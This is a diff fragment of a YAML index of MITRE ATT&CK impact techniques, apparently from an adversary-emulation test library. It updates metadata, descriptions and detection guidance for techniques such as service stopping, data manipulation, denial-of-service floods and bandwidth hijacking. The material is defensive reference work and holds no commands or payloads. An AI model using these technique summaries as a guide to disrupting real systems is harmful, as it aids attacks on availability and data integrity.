+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -113626,13 +114383,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -113640,12 +114404,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -113706,109 +114491,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -113817,10 +114572,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -113831,9 +114590,32 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests:
     - name: Windows - Stop service using Service Controller
@@ -114003,32 +114785,7 @@ impact:
         elevation_required: true
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -114046,13 +114803,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -114060,36 +114824,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -114098,11 +114853,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -114111,17 +114872,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -114130,6 +114905,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -114145,17 +114921,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -114165,14 +114936,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -114181,28 +114953,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -114213,7 +114985,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -114224,17 +114995,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -114271,7 +115037,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -114292,7 +115059,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -114319,12 +115086,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -114357,7 +115190,7 @@ impact:
